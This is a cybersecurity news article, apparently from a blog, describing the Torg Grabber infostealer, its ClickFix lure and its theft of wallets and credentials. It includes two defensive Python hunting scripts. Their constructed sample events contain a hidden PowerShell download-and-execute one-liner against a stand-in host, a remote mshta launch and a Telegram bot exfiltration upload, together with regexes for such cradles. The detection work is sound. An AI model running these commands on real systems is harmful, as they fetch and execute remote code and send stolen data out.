Torg Grabber Malware Targets 728 Crypto Wallets

A newly discovered infostealer has sent shockwaves through the cybersecurity community. Torg Grabber malware, identified by researchers at Gen Digital, targets 728 cryptocurrency wallet browser extensions, along with hundreds of password managers, two-factor authentication tools, and note-taking apps. It spreads through social engineering, moves fast, and goes after virtually every digital asset a victim might have.

This is not a niche threat. From MetaMask to obscure wallets most users have never heard of, Torg Grabber casts one of the widest nets ever seen in an infostealer campaign.

What Is Torg Grabber?

Torg Grabber is an infostealer — a type of malware built to quietly harvest sensitive data from an infected device and send it back to the attacker. Unlike ransomware, which locks files and demands payment, infostealers operate in the shadows. The victim often has no idea anything happened until accounts are drained or credentials appear for sale on dark web markets.

What makes Torg Grabber stand out is its sheer scope. Researchers documented 334 unique malware samples compiled in just three months, between December 2025 and February 2026. New command-and-control servers were registered every week throughout that period. This is not the work of a lone actor experimenting in their spare time. This is a production operation.

The malware also appears to be offered as a service. By the time researchers completed their analysis, 40 operator tags had been documented, suggesting a growing customer base of cybercriminals using Torg Grabber as a ready-made tool.

How It Gets Onto Your Device

Torg Grabber spreads through a technique called ClickFix. It works through social engineering rather than technical exploits, which makes it harder to defend against using traditional security tools.

A victim visits a compromised or malicious website and sees a convincing pop-up. The message might claim their browser needs a critical security update. A fake progress bar ticks away for several minutes to make the scenario feel legitimate. While the user waits, the malware is already executing in the background.

At the end of the fake process, the user is prompted to run a PowerShell command, believing it is part of the update. That command delivers the malware payload. Researchers have also seen this technique deployed through fake game cheat tools and cracked software downloads. The lure changes, but the mechanism stays the same.
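The delivery chain above ends with the victim typing or pasting a command into a Run box or terminal, and that moment leaves a process-creation record that a defender can hunt for. The following Python is an added example written for this article, not code from Gen Digital's report or from the malware; it runs a few heuristics over a handful of constructed Sysmon-style process-creation events (the events, the parent/child names and the flag patterns are assumptions about how a ClickFix launch typically looks, not indicators taken from the Torg Grabber samples).

```python
import re

# Assumption: commands pasted into the Win+R Run box or the Explorer address bar
# are spawned by explorer.exe, so a script host with explorer.exe as parent is
# treated as "launched interactively by the user".
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Command-line traits common to ClickFix-style one-liners (general PowerShell
# abuse patterns, not strings lifted from this campaign).
PATTERNS = {
    "encoded_command": re.compile(r"(?i)\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window": re.compile(r"(?i)\s-w(indowstyle)?\s+h(idden)?\b"),
    "exec_policy_bypass": re.compile(r"(?i)\s-(ep|executionpolicy)\s+bypass\b"),
    "invoke_expression": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "download_cradle": re.compile(
        r"(?i)\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b"),
    "remote_url": re.compile(r"(?i)https?://"),
    "clipboard_read": re.compile(r"(?i)get-clipboard"),
}

# Constructed sample telemetry (not real events): pid, image, parent image,
# full command line, user.
SAMPLE_EVENTS = [
    {"pid": 4312, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmd": "explorer.exe", "user": "DESK01\\alice"},
    {"pid": 5120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": 'powershell -w hidden -ep bypass -c "iex (iwr http://update-check.example/v.txt -UseBasicParsing).Content"',
     "user": "DESK01\\alice"},
    {"pid": 5300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmd": "powershell.exe -NoLogo -File .\\build.ps1", "user": "DESK01\\alice"},
    {"pid": 5411, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "mshta https://cdn.example/lure.hta", "user": "DESK01\\alice"},
    {"pid": 5500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmd": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\Intune\\inventory.ps1",
     "user": "NT AUTHORITY\\SYSTEM"},
]


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return a finding dict for a suspicious script-host launch, else None."""
    image, parent = basename(event["image"]), basename(event["parent"])
    if image not in SCRIPT_HOSTS:
        return None
    reasons = [name for name, rx in PATTERNS.items() if rx.search(event["cmd"])]
    interactive = parent in INTERACTIVE_PARENTS
    if interactive:
        reasons.insert(0, f"spawned_by_{parent}")
    # Rule: a script host started straight from the shell with any suspicious
    # flag, or any script host whose command line shows two or more of them.
    # A lone -ExecutionPolicy Bypass from a management agent is left alone.
    if (interactive and len(reasons) > 1) or (not interactive and len(reasons) >= 2):
        return {"pid": event["pid"], "user": event["user"], "reasons": reasons}
    return None


def hunt(events):
    """Run analyze() over a batch of events and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed batch, the rule flags the PowerShell cradle launched from explorer.exe and the remote HTA launched the same way, and stays quiet on the build script started by an editor and on the management agent's signed inventory script. A complementary host-side check, which is general Windows behaviour rather than something the article documents, is the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which keeps the text typed into the Run box and so preserves the pasted command even when the process record has aged out.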

What Torg Grabber Steals

The scope of what this malware targets is extraordinary. The headline figure is 728 cryptocurrency wallet browser extensions, covering everything from household names like MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, and OKX, to deeply obscure projects with tiny user bases. The thoroughness of the list suggests it was compiled systematically, not curated manually.

Beyond wallets, Torg Grabber targets 103 password managers and two-factor authentication extensions. The list includes LastPass, 1Password, Bitwarden, NordPass, Dashlane, and ProtonPass, among others. It also goes after 19 note-taking extensions, because users sometimes store passwords or recovery phrases in apps like these.

The malware scans 25 Chromium-based browsers and 8 Firefox variants, stealing saved credentials, cookies, and autofill data. Session cookies are particularly dangerous. They allow an attacker to log into accounts as if they were the victim, often bypassing the need for a password entirely.

Torg Grabber also steals data from Discord, Telegram, Steam, VPN apps, FTP clients, and email applications. It takes screenshots, profiles the host system, documents installed software including 24 antivirus tools, and lifts files directly from Desktop and Documents folders.

How It Avoids Detection

Torg Grabber uses several techniques to stay hidden. The final payload runs entirely in memory, leaving fewer traces for endpoint security tools to find. It uses multi-layered obfuscation and direct system calls to bypass monitoring software.

One of its most notable capabilities is bypassing App-Bound Encryption, a browser security mechanism introduced in Chrome 127 to protect stored cookies. A standalone tool called “Underground” injects itself into the browser environment, accesses Chrome’s internal encryption service, and retrieves master keys. This gives Torg Grabber access to data that is supposed to be protected by design.

The malware has also evolved its infrastructure over time. Early versions used Telegram bots for data exfiltration. Then came a custom encrypted TCP protocol. The current iteration routes stolen data through Cloudflare via HTTPS, making traffic much harder to identify and block.
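Each of the three exfiltration stages described above is visible in different telemetry. The Telegram bot stage is the easiest to spot from the network side, because the Bot API has a fixed URL shape (`/bot<id>:<token>/<method>` on api.telegram.org) that the official desktop client never uses; the later stages blend in and need process-level context. The Python below is an added example written for this article, not code from the researchers or the malware. It scans a few constructed proxy records (process, method, host, path, bytes sent) for Bot API calls and for large uploads from processes that have no business uploading, and redacts the bot token before it lands in an alert. The allowlists, the 1 MiB threshold and the sample hosts are assumptions chosen for the example.

```python
import re

# Telegram Bot API paths: /bot<numeric id>:<token>/<method>
BOT_PATH = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{30,})/(\w+)")

# Assumed tuning values: adjust to the environment.
LARGE_UPLOAD_BYTES = 1 * 1024 * 1024
# Processes expected to send large request bodies (browsers, mail, sync clients).
UPLOAD_ALLOWLIST = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "onedrive.exe"}
# Processes known to run legitimate Telegram bots; empty by default.
BOT_ALLOWLIST = set()

# Constructed proxy/EDR network records (not real logs):
# time process method host path bytes_out
SAMPLE_LOG = """\
2026-02-11T09:14:02Z chrome.exe POST mail.example.com /sync 1832
2026-02-11T09:14:05Z Telegram.exe POST 149.154.167.51 / 412
2026-02-11T09:14:09Z RuntimeBroker.exe POST api.telegram.org /bot7301:AAHkQx-CONSTRUCTED-TOKEN-VALUE-0000000000/sendDocument 2498120
2026-02-11T09:14:30Z svchost.exe POST tlu.dl.delivery.mp.microsoft.com /upload 51200
2026-02-11T09:15:01Z powershell.exe POST edge-relay.example /api/v2/upload 1890331
2026-02-11T09:15:40Z firefox.exe GET api.telegram.org /bot7301:AAHkQx-CONSTRUCTED-TOKEN-VALUE-0000000000/getUpdates 0
"""


def parse_line(line):
    """Split one whitespace-separated record into a dict with typed fields."""
    time, process, method, host, path, bytes_out = line.split()
    return {"time": time, "process": process, "method": method,
            "host": host.lower(), "path": path, "bytes_out": int(bytes_out)}


def evaluate(rec):
    """Return a finding for a suspicious record (token redacted), else None."""
    reasons = []
    proc = rec["process"].lower()
    bot_call = BOT_PATH.match(rec["path"]) if rec["host"] == "api.telegram.org" else None
    if bot_call and proc not in BOT_ALLOWLIST:
        reasons.append("telegram_bot_api")
    if (rec["method"] == "POST" and rec["bytes_out"] >= LARGE_UPLOAD_BYTES
            and proc not in UPLOAD_ALLOWLIST):
        reasons.append("large_upload_from_unexpected_process")
    if not reasons:
        return None
    # Never copy a bot token into an alert: keep the bot id, mask the secret.
    redacted = BOT_PATH.sub(r"/bot\1:***/\3", rec["path"])
    return {**rec, "path": redacted, "reasons": reasons}


def scan(text):
    """Parse and evaluate every non-empty line; return the list of findings."""
    return [f for f in (evaluate(parse_line(l)) for l in text.splitlines() if l.strip()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["process"], finding["host"] + finding["path"], finding["reasons"])
```

On the constructed records the scan raises RuntimeBroker.exe on both rules, the PowerShell upload to an unremarkable host on the size rule alone, and the browser's Bot API call on the API rule alone. The second finding illustrates the article's point about the HTTPS stage: nothing about the destination name gives it away, so the signal has to come from which process is sending and how much, ideally joined with the endpoint record of that same process reading browser profile directories shortly before.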

Final Thoughts

Torg Grabber malware represents a significant escalation in the infostealer threat landscape. Its combination of wide-net targeting, rapid development cycles, and layered evasion techniques makes it a serious risk for anyone who holds cryptocurrency, uses a password manager, or stores sensitive data in their browser.

The ClickFix delivery method is a reminder that technical defenses alone are not enough. Attackers are increasingly relying on tricking users rather than breaking through security tools. No legitimate software update will ever ask you to run a PowerShell command manually. If you see a prompt asking for that, close the browser immediately.

For crypto holders in particular, the safest approach is to use hardware wallets for significant holdings and treat browser-based wallets as temporary, low-value access points only. Regularly rotating credentials and enabling phishing-resistant two-factor authentication on all critical accounts also reduces the damage if an infostealer does land on your device.

Janet Andersen

Janet is an experienced content creator with a strong focus on cybersecurity and online privacy. With extensive experience in the field, she’s passionate about crafting in-depth reviews and guides that help readers make informed decisions about digital security tools. When she’s not managing the site, she loves staying on top of the latest trends in the digital world.